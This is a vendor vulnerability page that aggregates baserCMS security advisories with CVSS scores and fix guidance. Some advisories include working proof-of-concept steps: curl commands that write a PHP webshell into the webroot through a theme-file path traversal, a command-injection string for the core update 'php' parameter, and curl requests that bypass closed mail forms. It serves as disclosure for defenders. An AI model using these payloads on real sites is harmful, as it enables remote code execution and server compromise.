Where
-Infinity
0

Vendor Risk Score

See how basercms compares to other vendors in security performance

View Risk Score →
Severity
6.9
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

A missing authentication for critical function vulnerability exists in baserCMS. If this vulnerability is exploited, a remote attacker may obtain sensitive information.

First published (updated )
Severity
5.1
XSS
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

A stored cross-site scripting vulnerability via custom content descriptions exists in baserCMS. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser.

First published (updated )
Severity
5.1
XSS
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

A stored cross-site scripting vulnerability via appended strings in email form fields exists in baserCMS. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser.

First published (updated )
Severity
5.1
XSS
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Cross-Site Scripting via Script Validation Bypass exists in baserCMS. If this vulnerability is exploited, an arbitrary script may be executed in the user's web browser may be caused.

First published (updated )
Severity
8.6
EPSS
0.34%
AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

When converting baserCMS4-style addons to baserCMS5-style ones, BcAddonMigrator includes "config.php" from the addon, which means the PHP code in the file is executed. Arbitrary files on the system may be read or deleted by an administrative user.

First published (updated )
Severity
7.1
XSS
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

baserCMS has DOM-based cross-site scripting in tag creation.

Target baserCMS 5.2.2 and earlier versions

Vulnerability Malicious JavaScript may be executed when creating a tag.

Countermeasures Update to the latest version of baserCMS

Please refer to the following page to reference for more information. https://basercms.net/security/JVN94952030

Credits

- quanlna2 (Le Nguyen Anh Quan) - namdi (Do Ich Nam) - minhnn42 (Nguyen Ngoc Minh) - VCSLab - Viettel Cyber Security

1 / 2
Source: GitHub
First published (updated )
Severity
6.9
XSS
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

baserCMS has a cross-site scripting vulnerability in blog posts.

Target baserCMS 5.2.1 and earlier versions

Vulnerability

Malicious Javascript may be executed in blog posts.

Countermeasures Update to the latest version of baserCMS

Please refer to the following page to reference for more information. https://basercms.net/security/JVN20837860

Credits

Gai Tanaka@Mitsui Bussan Secure Directions, Inc.

1 / 2
Source: GitHub
First published (updated )
Severity
7.2
Path Traversal, XSS, CSRF
AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

A path traversal vulnerability exists in the baserCMS 5.x theme file management API (/baser/api/admin/bc-theme-file/themefiles/add.json) that allows arbitrary file write.

An authenticated administrator can include ../ sequences in the path parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).

Affected Code

File: plugins/bc-theme-file/src/Service/BcThemeFileService.php

php public function getFullpath(string $theme, string $plugin, string $type, string $path) { // ... return $viewPath . $type . DS . $path; // $path is not sanitized }

Attack Scenario

1. The attacker compromises an administrator account (password leak, brute force, etc.) 2. Obtains an access token via API login 3. Specifies path: "../../../../webroot/" in the theme file creation API 4. A PHP file is created in the webroot 5. The attacker accesses the created PHP file to achieve RCE

Reproduction Steps

bash 1. Login curl -X POST "http://target/baser/api/admin/baser-core/users/login.json" \ -H "Content-Type: application/json" \ -d '{"email":"admin@example.com","password":"password"}'

2. Create webshell curl -X POST "http://target/baser/api/admin/bc-theme-file/themefiles/add.json" \ -H "Authorization: Bearer <token>" \ -H "Content-Type: application/json" \ -d '{ "theme": "BcThemeSample", "plugin": "", "type": "layout", "path": "../../../../webroot/", "basename": "shell", "ext": "php", "contents": "<?php system($GET[\"cmd\"]); ?>" }'

3. RCE curl "http://target/shell.php?cmd=id"

Vulnerability Details

| Item | Details | |------|---------| | CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path | | Impact | Arbitrary file write, Remote Code Execution (RCE) | | Attack Prerequisites | Administrator privileges + API enabled (USECOREADMINAPI=true), or chaining with XSS, etc. | | Reproducibility | High (PoC verified) | | Test Environment | baserCMS 5.x (Docker environment) |

Additional Notes on Attack Prerequisites

- When API is enabled (USECOREADMINAPI=true): API calls can be made externally using JWT token authentication. Direct exploitation is possible. - Default settings (USECOREADMINAPI=false): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.

Recommended Fix

Rather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using realpath(), etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected.

The specific implementation location and method are left to the project's design decisions.

Comparison with Other CMS

WordPress's theme editor only allows editing within wp-content/themes/ and does not permit writes outside that directory. CVE-2019-8943 was reported as a path traversal vulnerability in wpcropimage() that allowed writing cropped image output to an arbitrary directory by including ../ in the filename.

This vulnerability is not a matter of "administrators being able to execute arbitrary code" by design, but rather stems from a security boundary violation where "the theme editing function can write outside the theme directory (to webroot, config, etc.)."

Resources

- OWASP Path Traversal: <https://owasp.org/www-community/attacks/PathTraversal> - WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/> - Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>

This advisory was translated from Japanese to English using GitHub Copilot.

1 / 2
Source: GitHub
First published (updated )
Severity
5.3
CSRF
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Summary A public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.

Details In baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in MailFrontService::isAccepting(), which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).

These checks are enforced in the UI flow handled by MailController::index() and MailController::confirm() (e.g. plugins/bc-mail/src/Controller/MailController.php).

However, the public API endpoint:

plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()

does not invoke MailFrontService::isAccepting() and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.

The endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.

PoC 1. In the admin UI, configure a mail form so that it is not accepting submissions (e.g. outside its acceptance period or explicitly closed). 2. Obtain a CSRF cookie by accessing the site root: curl -sS -D - -o - -c /tmp/basercmscookies.txt 'http://localhost/' 3. Extract the CSRF token from the csrfToken cookie and submit a POST request to the public API endpoint: curl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mailmessages/add/1.json' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Referer: http://localhost/' -H 'X-CSRF-Token: <csrf-token-from-cookie>' -b /tmp/basercmscookies.txt --data-urlencode 'name1=Test' --data-urlencode 'name2=User' --data-urlencode 'email1=test@example.com' --data-urlencode 'email2=test@example.com' --data-urlencode 'category[]=資料請求' --data-urlencode 'root=検索エンジン' --data-urlencode 'message=API bypass test' 4. The server responds with 200 OK and creates a mail message, even though the form is configured to reject submissions.

Impact This is an access control / business logic bypass vulnerability.

Administrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.

1 / 2
Source: GitHub
First published (updated )
Severity
9.1
OS Command Injection, Command Injection
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Summary The latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality. Due to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.

Details Please refer to the attached materials. OSコマンドインジェクション(baserCMSのアップデート機能).pdf

Impact An authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.

1 / 2
Source: GitHub
First published (updated )
Severity
9.2
OS Command Injection, Command Injection
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

baserCMS has an OS command injection vulnerability in the installer.

Target baserCMS 5.2.2 and earlier versions

Vulnerability

If baserCMS is placed on a server but not installed, malicious commands may be executed.

Countermeasures Update to the latest version of baserCMS

Please refer to the following page to reference for more information. https://basercms.net/security/JVN54513170

Credits

REN XINGDIAN

1 / 2
Source: GitHub
First published (updated )
Severity
6.9
SQL Injection
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

baserCMS has a SQL injection vulnerability in blog posts.

Target baserCMS 5.2.2 and earlier versions

Vulnerability

Malicious SQL may be executed in blog posts.

Countermeasures Update to the latest version of baserCMS

Please refer to the following page to reference for more information. https://basercms.net/security/JVN52157568

Credits

Mirai Matsumoto@Future Secure Wave, Inc.

1 / 2
Source: GitHub
First published (updated )
Severity
9.1
OS Command Injection, Command Injection, Input Validation, CSRF
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Summary

In the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the exec() function without proper validation or escaping. This issue allows an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE).

This vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from a design that directly executes input values received on the server side as OS commands. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, an attack is possible as long as a request containing a valid token is processed within an administrator session.

---

Vulnerability Information

| Item | Details | | ---- | ------- | | CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command | | Impact | Remote Code Execution (RCE) | | Severity | Critical | | Attack Requirements | Administrator privileges required | | Reproducibility | Reproducible (confirmed multiple times) | | Test Environment | baserCMS 5.2.2 (Docker / development environment) |

---

Affected Areas

- Controller - PluginsController::getcoreupdate() - Service - PluginsService::getCoreUpdate() - Affected Endpoint - /baser/admin/baser-core/plugins/getcoreupdate

---

Technical Details

Vulnerable Code Flow

text PluginsController::getcoreupdate() ↓ Retrieves php parameter from POST data PluginsService::getCoreUpdate($targetVersion, $php, $force) ↓ Concatenates $php into command string without validation or escaping exec($command)

Relevant Code (Excerpt)

PluginsController.php

php $service->getCoreUpdate( $request->getData('targetVersion') ?? '', $request->getData('php') ?? 'php', $request->getData('force'), );

PluginsService.php

php $command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' . $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';

exec($command, $out, $code);

The $php parameter is user input, and none of the following countermeasures are in place:

- Restriction via allowlist - Validation via regular expression - Escaping via escapeshellarg() or similar

---

Attack Scenario

1. The attacker logs in as a CMS administrator 2. Sends a POST request to the core update functionality in the admin panel 3. Specifies a string containing OS commands in the php parameter 4. exec() is executed on the server side, running the arbitrary OS command

Example Attack Input (Conceptual)

text php=php;id>/tmp/rcetest;#

---

Verification Results (PoC)

Execution Result

bash $ docker exec bc-php cat /tmp/rcetest uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)

The above confirms that OS commands can be executed with www-data privileges.

Additional Notes

- Reproducible through the legitimate flow in the admin panel (browser) - Succeeds even with CSRF/FormProtection tokens included in a legitimate request - Failure cases (400/403) have also been investigated and differentiated - Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)

---

Impact

If this vulnerability is exploited, the following becomes possible:

- Retrieval of server information - Reading/writing arbitrary files - Retrieval of application configuration information (DB credentials, etc.) - OS-level operations beyond application permission boundaries

Although administrator privileges are required, this is a design issue where the impact extends from the application layer to the OS layer, and the impact is considered significant.

---

Recommended Fix

Primary Recommendation

- Do not accept the PHP executable path from user input - Fix the PHP executable on the server side using the PHPBINARY constant

php $php = escapeshellarg(PHPBINARY);

Supplementary Fix Recommendations

- Apply escapeshellarg() escaping to other command-line arguments (version number, directory, etc.) as well - If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)

Alternative (Not Recommended)

- Allowlist validation for the PHP executable path - Combined use of regex validation and escapeshellarg()

However, from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended.

---

Additional Notes

- This issue is independent of UI display controls (showing/hiding buttons) - As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed - This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone

---

Conclusion

Due to a design issue in baserCMS's core update functionality where user input is passed to exec() without validation, Remote Code Execution (RCE) is achievable with administrator privileges. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.

This advisory was translated from Japanese to English using GitHub Copilot.

1 / 2
Source: GitHub
First published (updated )
Severity
8.7
Malicious File Upload
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

Details The application's restore function allows users to upload a .zip file, which is then automatically extracted. A PHP file inside the archive is included using requireonce without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.

Vector: Malicious ZIP upload + insecure requireonce

PoC 1. Restore backup !image 1. Load file shell (insecure requireonce) !image !image

Impact Remote Code Execution (RCE)

1 / 2
Source: GitHub
First published (updated )
Severity
7.1
XSS
AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

baserCMS is a website development framework. Versions prior to 5.1.2 have a cross-site scripting vulnerability in the Edit Email Form Settings Feature. Version 5.1.2 fixes the issue.

1 / 2
Source: MITRE
First published (updated )
Severity
6.3
XSS
AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N

baserCMS is a website development framework. Versions prior to 5.1.2 have a cross-site scripting vulnerability in the Blog posts feature. Version 5.1.2 fixes this issue.

1 / 2
Source: MITRE
First published (updated )
Severity
6.1
XSS
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

baserCMS is a website development framework. Versions prior to 5.1.2 have a cross-site scripting vulnerability in HTTP 400 Bad Request. Version 5.1.2 fixes this issue.

1 / 2
Source: MITRE
First published (updated )
Severity
5.4
XSS
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

baserCMS is a website development framework. Versions prior to 5.1.2 have a cross-site scripting vulnerability in Blog posts and Contents list Feature. Version 5.1.2 fixes this issue.

1 / 2
Source: MITRE
First published (updated )
Severity
5.4
EPSS
0.04%
XSS
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the content management feature. Version 5.0.9 contains a fix for this vulnerability.

1 / 2
Source: NVD
First published (updated )
Severity
8.1
OS Command Injection, Command Injection
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

baserCMS is a website development framework. Prior to version 5.0.9, there is an OS Command Injection vulnerability in the site search feature of baserCMS. Version 5.0.9 contains a fix for this vulnerability.

1 / 2
Source: NVD
First published (updated )
Severity
6.1
XSS
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

baserCMS is a website development framework. Prior to version 5.0.9, there is a cross-site scripting vulnerability in the site search feature. Version 5.0.9 contains a fix for this vulnerability.

1 / 2
Source: NVD
First published (updated )
Severity
9.8
Code Injection
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

baserCMS is a website development framework. In versions 4.6.0 through 4.7.6, there is a Code Injection vulnerability in the mail form of baserCMS. As of time of publication, no known patched versions are available.

1 / 2
Source: MITRE
First published (updated )
Severity
9.8
CSRF
AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

baserCMS is a website development framework. Prior to version 4.8.0, there is a cross site request forgery vulnerability in the content preview feature of baserCMS. Version 4.8.0 contains a patch for this issue.

1 / 2
Source: MITRE
First published (updated )
Severity
6.5
Path Traversal
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

baserCMS is a website development framework. Prior to version 4.8.0, there is a Directory Traversal Vulnerability in the form submission data management feature of baserCMS. Version 4.8.0 contains a patch for this issue.

1 / 2
Source: MITRE
First published (updated )
Severity
6.1
XSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

baserCMS is a website development framework. Prior to version 4.8.0, there is a cross-site scripting vulnerability in the file upload feature of baserCMS. Version 4.8.0 contains a patch for this issue.

1 / 2
First published (updated )
Severity
6.1
XSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

baserCMS is a website development framework with WebAPI that runs on PHP8 and CakePHP4. There is a XSS Vulnerability in Favorites Feature to baserCMS. This issue has been patched in version 4.8.0.

1 / 2
Source: MITRE
First published (updated )
Severity
9.8
Malicious File Upload
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

baserCMS is a Content Management system. Prior to version 4.7.5, any file may be uploaded on the management system of baserCMS. Version 4.7.5 contains a patch.

First published (updated )
Severity
9.8
Malicious File Upload
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

baserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. Version 4.7.5 contains a patch.

First published (updated )
Severity
4.8
XSS
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Stored cross-site scripting vulnerability in User group management of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.

First published (updated )
Severity
4.8
XSS
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Stored cross-site scripting vulnerability in Permission Settings of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.

First published (updated )

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203